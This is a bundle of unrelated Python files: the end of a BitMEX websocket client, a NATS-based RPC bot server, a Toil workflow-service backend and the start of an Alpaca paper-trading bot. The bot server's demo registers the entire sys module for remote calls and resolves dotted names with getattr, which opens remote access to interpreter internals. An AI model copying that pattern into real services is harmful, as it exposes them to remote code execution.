'margin,position,order,execution:' + self.pair + ',wallet,orderBookL2:' + self.pair #+ ',order:' + self.pair + ',execution:' + self.pair
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def __get_auth(self):
"""
get auth info
"""
api_key = conf['bitmex_test_keys'][self.account]['API_KEY'] if self.testnet else conf['bitmex_keys'][self.account]['API_KEY']
api_secret = conf['bitmex_test_keys'][self.account]['SECRET_KEY'] if self.testnet else conf['bitmex_keys'][self.account]['SECRET_KEY']
if len(api_key) > 0 and len(api_secret):
nonce = generate_nonce()
return [
"api-nonce: " + str(nonce),
"api-signature: " + generate_signature(api_secret, 'GET', '/realtime', nonce, ''),
"api-key:" + api_key
]
else:
logger.info("WebSocket is not authenticating.")
return []
def __start(self):
"""
start the websocket.
"""
while self.is_running:
self.ws.run_forever()
def __on_error(self, ws, message):
"""
On Error listener
:param ws:
:param message:
"""
logger.error(message)
logger.error(traceback.format_exc())
notify(f"Error occurred. {message}")
notify(traceback.format_exc())
def __on_message(self, ws, message):
"""
On Message listener
:param ws:
:param message:
:return:
"""
try:
obj = json.loads(message)
if 'table' in obj:
if len(obj['data']) <= 0:
return
table = obj['table']
action = obj['action']
data = obj['data']
if table.startswith("tradeBin"):
data[0]['timestamp'] = datetime.strptime(data[0]['timestamp'][:-5], '%Y-%m-%dT%H:%M:%S')
new_data = []
new_data.append(data[0])
#add placeholder tick so it resamples correctly
new_data.append({
"timestamp": data[0]['timestamp'] + timedelta(seconds=0.01),
"open": data[0]['close'],
"high": data[0]['close'],
"low" : data[0]['close'],
"close" : data[0]['close'],
"volume": 0
})
self.__emit(table, table[-2:], to_data_frame(new_data))
elif table.startswith("instrument"):
self.__emit(table, action, data[0])
elif table.startswith("margin"):
self.__emit(table, action, data[0])
elif table.startswith("position"):
self.__emit(table, action, data[0])
elif table == "order":
self.__emit(table, action, data[0])
elif table.startswith("execution"):
self.__emit(table, action, data[0])
elif table.startswith("wallet"):
self.__emit(table, action, data[0])
elif table.startswith("orderBookL2"):
self.__emit(table, action, data)
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
def __emit(self, key, action, value):
"""
send data
"""
if key in self.handlers:
self.handlers[key](action, value)
def __on_close(self, ws):
"""
On Close Listener
:param ws:
"""
if 'close' in self.handlers:
self.handlers['close']()
if self.is_running:
logger.info("Websocket restart")
notify(f"Websocket restart")
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def on_close(self, func):
"""
on close fn
:param func:
"""
self.handlers['close'] = func
def bind(self, key, func):
"""
bind fn
:param key:
:param func:
"""
if key == '1m':
self.handlers['tradeBin1m'] = func
if key == '5m':
self.handlers['tradeBin5m'] = func
if key == '1h':
self.handlers['tradeBin1h'] = func
if key == '1d':
self.handlers['tradeBin1d'] = func
if key == 'instrument':
self.handlers['instrument'] = func
if key == 'margin':
self.handlers['margin'] = func
if key == 'position':
self.handlers['position'] = func
if key == 'order':
self.handlers['order'] = func
if key == 'execution':
self.handlers['execution'] = func
if key == 'wallet':
self.handlers['wallet'] = func
if key == 'orderBookL2':
self.handlers['orderBookL2'] = func
def close(self):
"""
close websocket
"""
self.is_running = False
self.ws.close()
|
botserver.py
|
# coding: utf-8
from __future__ import absolute_import, with_statement, print_function, unicode_literals
__version__ = '20.272.2127' # gzip_decode
#__version__ = '20.260.0040' # binary
#__version__ = '20.219.1837'
#__version__ = '20.211.1402'
#__version__ = '20.196.1406'
#__version__ = '20.104.0843'
#__version__ = '20.053.0012'
#__version__ = '20.022.0414'
#__version__ = '19.347.1606'
import sys
PY2 = sys.version_info[0] < 3
PY3 = sys.version_info[0] > 2
if __name__ == '__main__':
# env PYTHONIOENCODING="UTF-8"
if PY2:
reload(sys); sys.setdefaultencoding('UTF-8')
else:
if sys.stdout.encoding != 'UTF-8':
sys.stdout = open(sys.stdout.fileno(), mode='w', buffering=1, encoding='UTF-8')
#if sys.stderr.encoding != 'UTF-8':
# sys.stderr = open(sys.stderr.fileno(), mode='w', buffering=1, encoding='UTF-8')
sys.stderr.close()
sys.stderr = sys.stdout
import socket
try:
__hostname__ = sys.__hostname__
except:
__hostname__ = socket.gethostname().lower()
sys.__hostname__ = __hostname__
if PY2:
import ConfigParser as configparser
input = raw_input
from urllib import quote_plus, unquote_plus, urlencode
from urlparse import urlparse
BrokenPipeError = socket.error
ConnectionRefusedError = socket.error
from xmlrpclib import gzip_decode, gzip_encode
else:
import configparser
raw_input = input
from urllib.parse import quote_plus, unquote_plus, urlencode, urlparse
from xmlrpc.client import gzip_decode, gzip_encode
import os, time, json #, pickle
from threading import Thread, RLock
import pydoc
import threading, types, traceback
import uuid, hashlib, base64
import random
import decimal, datetime
class ExtJSONEncoder(json.JSONEncoder):
def default(self, obj):
#if isinstance(obj, Binary):
# return {'__binary__': obj.encode()}
if isinstance(obj, decimal.Decimal):
return float(obj)
elif isinstance(obj, datetime.datetime):
return str(obj)
elif isinstance(obj, datetime.date):
return str(obj)
elif isinstance(obj, set):
return list(obj)
return json.JSONEncoder.default(self, obj)
try:
from types import SimpleNamespace
except ImportError:
class SimpleNamespace (object):
def __init__ (self, **kwargs):
self.__dict__.update(kwargs)
def __repr__ (self):
keys = sorted(self.__dict__)
items = ("{}={!r}".format(k, self.__dict__[k]) for k in keys)
return "{}({})".format(type(self).__name__, ", ".join(items))
def __eq__ (self, other):
return self.__dict__ == other.__dict__
if PY2:
Binary = lambda data: {'__binary__': base64.b64encode(data)}
else:
Binary = lambda data: {'__binary__': base64.b64encode(data).decode('ascii')}
_binary = lambda obj: SimpleNamespace(data=base64.b64decode(obj.pop('__binary__'))) if '__binary__' in obj else obj
try:
_ns
except:
_ns = SimpleNamespace(request_number=0, request_count=0)
class BOTServer(object):
def __init__(self, name, address=None, authkey=None, max_requests=0):
self._max_requests = max_requests
self._info = {}
self._sock = None
self._w_lck = RLock()
self._fg_serve_forever = False
self._functions = {}
self._botname = name
self.bot_id = 'bot.%s' % urn5(name)
if address is None:
address = ('127.0.0.1', 4222)
self._address = address
self._authkey = authkey
self.register_function(self._system_list_methods, 'system.listMethods')
self.register_function(self._system_method_help, 'system.methodHelp')
self.register_function(self._http, '.http')
@property
def request_number(self):
return _ns.request_number
@property
def request_count(self):
return _ns.request_count
def __repr__(self):
return (
"<%s for %s %s>" % (self.__class__.__name__, self._botname, self._address)
)
__str__ = __repr__
def _system_list_methods(self, func_name=None):
#print(1111, func_name)
if func_name:
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
if func:
return list(sorted('%s.' % k if isinstance(getattr(func, k), sys.__class__) or hasattr(getattr(func, k), '_system_list_methods') else k for k in dir(func) if '_' != k[:1]))
else:
return RuntimeError('%s not found' % func_name)
else:
return list(sorted('%s.' % k if isinstance(v, sys.__class__) or hasattr(v, '_system_list_methods') else k for k, v in self._functions.items()))
def _system_method_help(self, func_name):
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
if func:
return pydoc.getdoc(func)
else:
return ''
def _http(self, head, body):
return '200 Not Found', [], b''
#status = '200 OK'
#headers = [('Content-Type', 'text/plain; charset=utf-8'),]
#return status, headers, ('<%s>' % __hostname__).encode()
def register_function(self, func, name=None):
if name:
self._functions[name] = func
else:
self._functions[func.__name__] = func
def register_instance(self, instance, allow_dotted_names=False):
for name in dir(instance):
if '_' == name[:1]:
continue
func = getattr(instance, name)
if allow_dotted_names:
self._functions[name] = func
else:
if callable(func):
self._functions[name] = func
def close(self):
self._fg_serve_forever = False
self._unsub()
self._close()
def _close(self):
try:
if self._sock:
with self._w_lck:
self._sock.close()
except:
#log(None)
pass
def _unsub(self):
try:
if self._sock:
with self._w_lck:
self._sock.sendall(b'UNSUB 2\r\nUNSUB 3\r\n')
except:
#log(None)
pass
def serve_forever(self):
self.close()
#try:
# self._serve_forever()
#finally:
# self.close()
_defer = []
defer = _defer.append
_err_old = ''
_fg_loop = True
while _fg_loop:
_fg_loop = False
try:
self._serve_forever(defer)
except (ConnectionRefusedError, RuntimeError) as e:
#traceback.print_exc()
_fg_loop = True # self._fg_serve_forever
_err = str(e)
if _err_old != _err:
_err_old = _err
log(_err, kind='error1')
try:
time.sleep(1 + random.random())
except:
_fg_loop = False
pass
#log('stop', begin='\r')
except Exception as e:
_fg_loop = self._fg_serve_forever
#traceback.print_exc()
_err = str(e)
if _err_old != _err:
_err_old = _err
log(_err, kind='error2')
#log(None)
finally:
while _defer:
func = _defer.pop(-1)
try:
func()
except:
#log(None)
pass
#print(2222)
def notify(self, subject, data=None):
if not self._fg_serve_forever:
return
if data is None:
data = ('PUB %s 0\r\n\r\n' % subject).encode('utf8')
else:
data = json.dumps(data, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
#data = pickle.dumps(data, protocol=2)
if len(data) > 1400:
data = gzip_encode(data)
data = ('PUB %s %s\r\n' % (subject, len(data))).encode('utf8') + data + b'\r\n'
#print('data:', data)
with self._w_lck:
try:
self._sock.sendall(data)
return True
except:
traceback.print_exc()
def _send(self, inbox_id, obj, fg_http=False):
if fg_http:
#if len(obj[2]) > 1400 and b'\x1f\x8b\x08\x00' != obj[2][:4]:
# data = b''.join([b'HTTP', json.dumps(obj[:2], ensure_ascii=False, separators=(',', ':')).encode('utf8'), b'\r\n', gzip_encode(obj[2])])
#else:
data = b''.join([b'HTTP', json.dumps(obj[:2], ensure_ascii=False, separators=(',', ':')).encode('utf8'), b'\r\n', obj[2]])
else:
data = json.dumps(obj, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
if len(data) > 1400:
data = gzip_encode(data)
data = b'PUB %s %s\r\n%s\r\n' % (inbox_id.encode(), ('%s' % len(data)).encode(), data)
with self._w_lck:
#log(repr(data), 'send2')
self._sock.sendall(data)
return len(data)
def _serve_forever(self, defer):
#while True:
# client_c = self.accept()
# t = Thread(target=self.handle_client, args=(client_c,))
# t.daemon = True
# t.start()
#print('00000', self._sock)
sock = socket.create_connection(self._address, 2)
self._sock = sock
defer(sock.close)
defer(lambda: sock.sendall(b'UNSUB 2\r\nUNSUB 3\r\n'))
def w(data):
with self._w_lck:
#log(repr(data), 'send1')
sock.sendall(data)
bot_name = self._botname
bot_id = self.bot_id # 'bot.%s' % urn5(bot_name)
"""
w(('CONNECT {"name":"%s","verbose":false,"pedantic":false}\r\n' % bot_name).encode('utf8'))
data = 'SUB bot.info 2\r\n'
#log(data, 'NATS')
w(data.encode('utf8'))
#data = 'SUB %s 3\r\n' % (bot_id,)
data = 'SUB %s %s 3\r\n' % (bot_id, bot_id)
#log(data, 'NATS')
w(data.encode('utf8'))
"""
w(('CONNECT {"name":"%s","verbose":false,"pedantic":false}\r\n' % bot_name).encode('utf8') + ('SUB bot.info 2\r\nSUB %s %s 3\r\n' % (bot_id, bot_id)).encode('utf8'))
self._fg_serve_forever = True
c = 0
while self._fg_serve_forever:
cmd = ''
data = ''
try:
data = recvline(sock)
cmd, data = data[:3], data[3:]
except socket.timeout:
c += 1
#log('%s) timeout' % c, 'socket0')
if c > 3:
c = 0
#log('pong) timeout', 'socket0')
w(b'PONG\r\n')
continue
finally:
if self._max_requests < 0 and _ns.request_count < 1:
self.close()
raise ValueError('MAX REQUESTS %s' % _ns.request_number) # KeyboardInterrupt
#os._exit(0)
if not cmd:
raise RuntimeError('[ Socket ] cmd is empty')
if not data:
raise RuntimeError('[ Socket ] data is empty')
#log('>%s<' % data, '<%s>' % cmd)
if 'MSG' == cmd:
#MSG <subject> <sid> [reply-to] <#bytes>\r\n[payload]\r\n
data = data.split()
#print('data:', data)
if 3 == len(data):
subj, sid, reply_id, size = data[0], data[1], '', int(data[2])
else:
subj, sid, reply_id, size = data[0], data[1], data[2], int(data[3])
payload = recvall(sock, size) if size > 0 else b''
sock.recv(1)
sock.recv(1)
#log(cmd, 'nats')
#print(cmd, subj, sid, reply_id, repr(payload)[:32], '...', len(payload), size)
if sid == '2' and reply_id and not payload:
log(subj, 'sid 2 subj:')
#sys.stdout.flush()
#MSG bot.info 2 cli.a1f9d72027a9455496efc3947fc4ea8c b''
#w(('PUB %s %s %s\r\n%s\r\n' % (reply_id, bot_id, len(bot_name), bot_name)).encode('utf8'))
elif sid == '3' and reply_id:
data = ('PUB %s 0\r\n\r\n' % reply_id).encode('utf8') # ask
#print('data:', data)
w(data)
"""
with self._w_lck:
try:
self._sock.sendall(data)
except:
traceback.print_exc()
"""
_ns.request_number += 1
_t = Thread(target=self.handle_client, args=(reply_id, payload))
_t.daemon = True
_t.name += '-msg'
_t.start()
#sys.stdout.flush()
elif 'PIN' == cmd:
w(b'PONG\r\n')
elif 'PON' == cmd:
pass
elif 'INF' == cmd:
self._info = json.loads(data[2:])
#self._info = json.loads(data[5:])
#cid = self._info['client_id']
#w(('SUB bot.info 2\r\nSUB %s %s 3\r\n' % (bot_id, bot_id)).encode('utf8'))
elif cmd in ('+OK', '-ER'):
pass
def handle_client(self, reply_id, payload):
try:
_ns.request_count += 1
return self._handle_client(reply_id, payload)
finally:
_ns.request_count -= 1
if self._max_requests > 0:
with self._w_lck:
if self._max_requests > 0 and _ns.request_number >= self._max_requests:
self._unsub()
self._max_requests = -1
def _handle_client(self, reply_id, payload):
#threading.current_thread().conn = client_c
_fg = True
while _fg:
fg_http = False
_fg = False
try:
if b'HTTP' == payload[:4]:
head, payload = payload.split(b'\r\n', 1)
head = json.loads(head[4:])
#if b'\x1f\x8b\x08\x00' == payload[:4]:
# payload = gzip_decode(payload, -1)
#print(head)
#print(payload)
func_name = '.http'
args = (head, payload)
kwargs = {}
fg_http = True
else:
if b'\x1f\x8b\x08\x00' == payload[:4]:
if PY2:
payload = gzip_decode(payload)
else:
payload = gzip_decode(payload, -1)
payload = json.loads(payload, object_hook=_binary)
func_name = payload.get('method', '')
args = payload.pop('args', [])
kwargs = payload.pop('kwargs', {})
#except EOFError:
# #print('close:', client_c)
# #sys.stdout.flush()
# break
except Exception as e:
print('recv:', type(e), str(e))
traceback.print_exc()
sys.stdout.flush()
break
#print(111)
try:
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
#print(222, func)
if func:
if callable(func):
r = func(*args, **kwargs)
"""
if isinstance(r, types.GeneratorType):
self._send(reply_id, {'result': list}) # types.ListType)
#client_c.send('types.GeneratorType')
for v in r:
self._send(reply_id, {'result': v})
self._send(reply_id, {'result': StopIteration})
continue
"""
else:
r = func
if fg_http:
_len = self._send(reply_id, r, fg_http=True)
else:
_len = self._send(reply_id, {'result': r})
else:
r = RuntimeError('%s not found' % func_name)
_len = self._send(reply_id, {'error': str(r)})
#print('send >>', _len)
except Exception as e:
try:
self._send(reply_id, {'error': str(e)})
except IOError:
break
except Exception as e:
print('send:', type(e), str(e))
sys.stdout.flush()
break
def recvline(s):
data = []
while True:
ch2 = s.recv(2)
if ch2:
data.append(ch2)
if ch2[-1:] == b'\r':
data.append(s.recv(1))
break
elif ch2[-1:] == b'\n':
break
else:
break
return b''.join(data).decode()
def recvall(r, n):
data = []
c = 0
while c < n:
packet = r.recv(n - c)
if not packet:
break
c += len(packet)
data.append(packet)
return b''.join(data)
"""
def readall(r, n):
data = []
c = 0
while c < n:
#log(c, n)
packet = r.read(n - c)
if not packet:
return b''
c += len(packet)
data.append(packet)
return b''.join(data)
"""
def urn1(name):
h1 = hashlib.sha1(uuid.NAMESPACE_DNS.bytes)
h1.update(name.encode())
return base64.b32encode(h1.digest()).decode('utf8')
#return 'urn:sha1:%s' % base64.b32encode(h1.digest()).decode('utf8')
def urn5(name):
h5 = hashlib.md5(uuid.NAMESPACE_DNS.bytes)
h5.update(name.encode())
return base64.b16encode(h5.digest()).decode('utf8').lower()
#return 'urn:md5:%s' % base64.b16encode(h5.digest()).decode('utf8').lower()
class BOTApi(object):
def _system_list_methods(self, func_name=None):
return list(sorted(k for k in dir(self) if '_' != k[:1]))
def add2(self, x, y):
""" help add2 """
return x + y
def sub2(self, x, y):
return x - y
#def ping(self, name, port):
# client_c = threading.current_thread().conn
# s = socket.fromfd(client_c.fileno(), socket.AF_INET, socket.SOCK_STREAM)
# #print(s, dir(s), s.getpeername()[0], s.getsockname(), s.gettimeout())
# client_ip = s.getpeername()[0]
# s.close()
# return client_ip, port
_ts = "%Y-%m-%d %H:%M:%S"
__appname__ = 'bot'
__profile__ = 'test'
__index__ = os.getpid()
def log(msg, kind='info', begin='', end='\n'):
global _ts, __hostname__, __appname__, __profile__, __version__, __index__
try:
try: ts = time.strftime(_ts)
except: ts = time.strftime(_ts)
if msg is None:
data = ''.join(
('%s %s %s.%s %s %s:%s %s\n' % (ts, __hostname__, __appname__,__profile__,__version__,__index__,'traceback', msg)
if i else '%s %s %s.%s %s %s:%s\n' % (ts, __hostname__, __appname__,__profile__,__version__,__index__,msg)
) for i, msg in enumerate(traceback.format_exc().splitlines())
)
else:
data = '%s%s %s %s.%s %s %s:%s %s%s' % (begin,ts, __hostname__, __appname__,__profile__,__version__,__index__,kind, msg,end)
sys.stdout.write(data)
sys.stdout.flush()
except:
pass
#traceback.print_exc()
try:
if sys.log:
log = sys.log
except:
pass
################################
def run_api(name, object_function=None, func_name=None):
# Create and run the server
#serv = BOTServer(name)
#serv = BOTServer(name, ('nats0.tgbot.ms', 4222))
serv = BOTServer(name, ('127.0.0.1', 4222))
#serv = BOTServer(name, ('nats1.tgbot.ms', 4222))
# api = BOTApi()
# serv.register_function(api, 'api')
print(serv)
if object_function:
serv.register_function(object_function, func_name)
#o = dict(k1='v1', k2='v2', k3='v3')
#serv.register_instance(o)
#from pprint import pprint
#pprint(serv._functions)
serv.register_function(sys)
serv.register_function(time)
serv.register_function(time.sleep)
_th = Thread(target=serv.serve_forever)
_th.daemon = True
_th.start()
try:
#serv.serve_forever()
while True:
s = input('>> ').strip()
if not s:
print(serv.notify('SUBJ.' + serv.bot_id, {1:2, 'k2': 'v4'}))
else:
raise KeyboardInterrupt
except (KeyboardInterrupt, SystemExit) as e:
print('stoped server')
sys.stdout.flush()
if __name__ == '__main__':
try:
s = sys.argv[1]
except:
s = ''
run_api('mybot.conf')
#run_api('price-bot.test' + s)
|
toil_wes.py
|
import json
import os
import subprocess
import time
import logging
import uuid
import shutil
from multiprocessing import Process
from wes_service.util import WESBackend
logging.basicConfig(level=logging.INFO)
class ToilWorkflow:
def __init__(self, run_id):
"""
Represents a toil workflow.
:param str run_id: A uuid string. Used to name the folder that contains
all of the files containing this particular workflow instance's information.
"""
super().__init__()
self.run_id = run_id
self.workdir = os.path.join(os.getcwd(), "workflows", self.run_id)
self.outdir = os.path.join(self.workdir, "outdir")
if not os.path.exists(self.outdir):
os.makedirs(self.outdir)
self.outfile = os.path.join(self.workdir, "stdout")
self.errfile = os.path.join(self.workdir, "stderr")
self.starttime = os.path.join(self.workdir, "starttime")
self.endtime = os.path.join(self.workdir, "endtime")
self.pidfile = os.path.join(self.workdir, "pid")
self.statcompletefile = os.path.join(self.workdir, "status_completed")
self.staterrorfile = os.path.join(self.workdir, "status_error")
self.cmdfile = os.path.join(self.workdir, "cmd")
self.jobstorefile = os.path.join(self.workdir, "jobstore")
self.request_json = os.path.join(self.workdir, "request.json")
self.input_json = os.path.join(self.workdir, "wes_input.json")
self.jobstore_default = "file:" + os.path.join(self.workdir, "toiljobstore")
self.jobstore = None
def sort_toil_options(self, extra):
# determine jobstore and set a new default if the user did not set one
cloud = False
for e in extra:
if e.startswith("--jobStore="):
self.jobstore = e[11:]
if self.jobstore.startswith(("aws", "google", "azure")):
cloud = True
if e.startswith(("--outdir=", "-o=")):
extra.remove(e)
if not cloud:
extra.append("--outdir=" + self.outdir)
if not self.jobstore:
extra.append("--jobStore=" + self.jobstore_default)
self.jobstore = self.jobstore_default
# store the jobstore location
with open(self.jobstorefile, "w") as f:
f.write(self.jobstore)
return extra
def write_workflow(self, request, opts, cwd, wftype="cwl"):
"""Writes a cwl, wdl, or python file as appropriate from the request dictionary."""
workflow_url = request.get("workflow_url")
# link the cwl and json into the cwd
if workflow_url.startswith("file://"):
try:
os.link(workflow_url[7:], os.path.join(cwd, "wes_workflow." + wftype))
except OSError:
os.symlink(
workflow_url[7:], os.path.join(cwd, "wes_workflow." + wftype)
)
workflow_url = os.path.join(cwd, "wes_workflow." + wftype)
try:
os.link(self.input_json, os.path.join(cwd, "wes_input.json"))
except OSError:
os.symlink(self.input_json, os.path.join(cwd, "wes_input.json"))
self.input_json = os.path.join(cwd, "wes_input.json")
extra_options = self.sort_toil_options(opts.getoptlist("extra"))
if wftype == "cwl":
command_args = (
["toil-cwl-runner"] + extra_options + [workflow_url, self.input_json]
)
elif wftype == "wdl":
command_args = (
["toil-wdl-runner"] + extra_options + [workflow_url, self.input_json]
)
elif wftype == "py":
command_args = ["python"] + extra_options + [workflow_url]
else:
raise RuntimeError(
'workflow_type is not "cwl", "wdl", or "py": ' + str(wftype)
)
return command_args
def write_json(self, request_dict):
input_json = os.path.join(self.workdir, "input.json")
with open(input_json, "w") as f:
json.dump(request_dict["workflow_params"], f)
return input_json
def call_cmd(self, cmd, cwd):
"""
Calls a command with Popen.
Writes stdout, stderr, and the command to separate files.
:param cmd: A string or array of strings.
:param tempdir:
:return: The pid of the command.
"""
with open(self.cmdfile, "w") as f:
f.write(str(cmd))
stdout = open(self.outfile, "w")
stderr = open(self.errfile, "w")
logging.info(
"Calling: %s, with outfile: %s and errfile: %s",
(" ".join(cmd)),
self.outfile,
self.errfile,
)
process = subprocess.Popen(
cmd, stdout=stdout, stderr=stderr, close_fds=True, cwd=cwd
)
stdout.close()
stderr.close()
return process.pid
def cancel(self):
pass
def fetch(self, filename):
if os.path.exists(filename):
with open(filename) as f:
return f.read()
return ""
def getlog(self):
state, exit_code = self.getstate()
with open(self.request_json) as f:
request = json.load(f)
with open(self.jobstorefile) as f:
self.jobstore = f.read()
stderr = self.fetch(self.errfile)
starttime = self.fetch(self.starttime)
endtime = self.fetch(self.endtime)
cmd = [self.fetch(self.cmdfile)]
outputobj = {}
if state == "COMPLETE":
# only tested locally
if self.jobstore.startswith("file:"):
for f in os.listdir(self.outdir):
if f.startswith("out_tmpdir"):
shutil.rmtree(os.path.join(self.outdir, f))
for f in os.listdir(self.outdir):
outputobj[f] = {
"location": os.path.join(self.outdir, f),
"size": os.stat(os.path.join(self.outdir, f)).st_size,
"class": "File",
}
return {
"run_id": self.run_id,
"request": request,
"state": state,
"run_log": {
"cmd": cmd,
"start_time": starttime,
"end_time": endtime,
"stdout": "",
"stderr": stderr,
"exit_code": exit_code,
},
"task_logs": [],
"outputs": outputobj,
}
def run(self, request, tempdir, opts):
"""
Constructs a command to run a cwl/json from requests and opts,
runs it, and deposits the outputs in outdir.
Runner:
opts.getopt("runner", default="cwl-runner")
CWL (url):
request["workflow_url"] == a url to a cwl file
or
request["workflow_attachment"] == input cwl text (written to a file and a url constructed for that file)
JSON File:
request["workflow_params"] == input json text (to be written to a file)
:param dict request: A dictionary containing the cwl/json information.
:param str tempdir: Folder where input files have been staged and the cwd to run at.
:param wes_service.util.WESBackend opts: contains the user's arguments;
specifically the runner and runner options
:return: {"run_id": self.run_id, "state": state}
"""
wftype = request["workflow_type"].lower().strip()
version = request["workflow_type_version"]
if wftype == "cwl" and version not in ("v1.0", "v1.1", "v1.2"):
raise RuntimeError(
'workflow_type "cwl" requires '
'"workflow_type_version" to be "v1.[012]": ' + str(version)
)
if version != "2.7" and wftype == "py":
raise RuntimeError(
'workflow_type "py" requires '
'"workflow_type_version" to be "2.7": ' + str(version)
)
logging.info("Beginning Toil Workflow ID: " + str(self.run_id))
with open(self.starttime, "w") as f:
f.write(str(time.time()))
with open(self.request_json, "w") as f:
json.dump(request, f)
with open(self.input_json, "w") as inputtemp:
json.dump(request["workflow_params"], inputtemp)
command_args = self.write_workflow(request, opts, tempdir, wftype=wftype)
pid = self.call_cmd(command_args, tempdir)
with open(self.endtime, "w") as f:
f.write(str(time.time()))
with open(self.pidfile, "w") as f:
f.write(str(pid))
return self.getstatus()
def getstate(self):
"""
Returns QUEUED, -1
INITIALIZING, -1
RUNNING, -1
COMPLETE, 0
or
EXECUTOR_ERROR, 255
"""
# the jobstore never existed
if not os.path.exists(self.jobstorefile):
logging.info("Workflow " + self.run_id + ": QUEUED")
return "QUEUED", -1
# completed earlier
if os.path.exists(self.statcompletefile):
logging.info("Workflow " + self.run_id + ": COMPLETE")
return "COMPLETE", 0
# errored earlier
if os.path.exists(self.staterrorfile):
logging.info("Workflow " + self.run_id + ": EXECUTOR_ERROR")
return "EXECUTOR_ERROR", 255
# the workflow is staged but has not run yet
if not os.path.exists(self.errfile):
logging.info("Workflow " + self.run_id + ": INITIALIZING")
return "INITIALIZING", -1
completed = False
with open(self.errfile) as f:
for line in f:
if "Traceback (most recent call last)" in line:
logging.info("Workflow " + self.run_id + ": EXECUTOR_ERROR")
open(self.staterrorfile, "a").close()
return "EXECUTOR_ERROR", 255
if (
subprocess.run(
["toil", "status", "--failIfNotComplete", self.jobstorefile]
).returncode
== 0
):
completed = True
if completed:
logging.info("Workflow " + self.run_id + ": COMPLETE")
open(self.statcompletefile, "a").close()
return "COMPLETE", 0
logging.info("Workflow " + self.run_id + ": RUNNING")
return "RUNNING", -1
def getstatus(self):
state, exit_code = self.getstate()
return {"run_id": self.run_id, "state": state}
class ToilBackend(WESBackend):
processes = {}
def GetServiceInfo(self):
return {
"workflow_type_versions": {
"CWL": {"workflow_type_version": ["v1.0", "v1.1", "v1.2"]},
"WDL": {"workflow_type_version": ["draft-2"]},
"PY": {"workflow_type_version": ["2.7"]},
},
"supported_wes_versions": ["0.3.0", "1.0.0"],
"supported_filesystem_protocols": ["file", "http", "https"],
"workflow_engine_versions": ["3.16.0"],
"system_state_counts": {},
"key_values": {},
}
def ListRuns(self, page_size=None, page_token=None, state_search=None):
# FIXME #15 results don't page
if not os.path.exists(os.path.join(os.getcwd(), "workflows")):
return {"workflows": [], "next_page_token": ""}
wf = []
for entry in os.listdir(os.path.join(os.getcwd(), "workflows")):
if os.path.isdir(os.path.join(os.getcwd(), "workflows", entry)):
wf.append(ToilWorkflow(entry))
workflows = [{"run_id": w.run_id, "state": w.getstate()[0]} for w in wf] # NOQA
return {"workflows": workflows, "next_page_token": ""}
def RunWorkflow(self):
tempdir, body = self.collect_attachments()
run_id = uuid.uuid4().hex
job = ToilWorkflow(run_id)
p = Process(target=job.run, args=(body, tempdir, self))
p.start()
self.processes[run_id] = p
return {"run_id": run_id}
def GetRunLog(self, run_id):
job = ToilWorkflow(run_id)
return job.getlog()
def CancelRun(self, run_id):
# should this block with `p.is_alive()`?
if run_id in self.processes:
self.processes[run_id].terminate()
return {"run_id": run_id}
def GetRunStatus(self, run_id):
job = ToilWorkflow(run_id)
return job.getstatus()
def create_backend(app, opts):
return ToilBackend(opts)
|
alpaca_paper.py
|
'''Reference: https://github.com/alpacahq/alpaca-trade-api-python/tree/master/examples'''
import datetime
import threading
from neo_finrl.alpaca.alpaca_engineer import AlpacaEngineer
import alpaca_trade_api as tradeapi
import time
import pandas as pd
import numpy as np
import torch
'''please input your own account info'''
API_KEY = ""
API_SECRET = ""
APCA_API_BASE_URL = 'https://paper-api.alpaca.markets'
data_url = 'wss://data.alpaca.markets'
'''load prepared model'''
action_dim = 5
state_dim = 1+ 1 + 1+ 2*5+ 5*7
from elegantrl.agent import AgentPPO
agent = AgentPPO()
net_dim = 2 ** 7
cwd = './AgentPPO/test-v1'
agent.init(net_dim, state_dim, action_dim)
agent.save_load_model(cwd=cwd, if_save=False)
act = agent.act
device = agent.device
'''paper trading class'''
class PPO_PaperTrading:
def __init__(self):
self.alpaca = tradeapi.REST(API_KEY,API_SECRET,APCA_API_BASE_URL, 'v2')
stockUniverse = [
'AAPL', 'AMZN', 'FB', 'GOOG', 'NFLX'
]
self.stocks = np.asarray([0] * len(stockUniverse))
self.cash = None
self.stocks_df = pd.DataFrame(self.stocks, columns=['stocks'], index = stockUniverse)
self.stockUniverse = stockUniverse
self.price = np.asarray([0] * len(stockUniverse))
self.turb_bool = 0
self.equities = []
def run(self):
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
if(self.timeToClose < (60 * 15)):
# Close all positions when 15 minutes til market close.
print("Market closing soon. Closing positions.")
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)
else:
# Trade and save equity records
trade = threading.Thread(target=self.trade)
trade.start()
trade.join()
last_equity = float(self.alpaca.get_account().last_equity)
cur_time = time.time()
self.equities.append([cur_time,last_equity])
np.save('./equity.npy', np.asarray(self.equities, dtype = float))
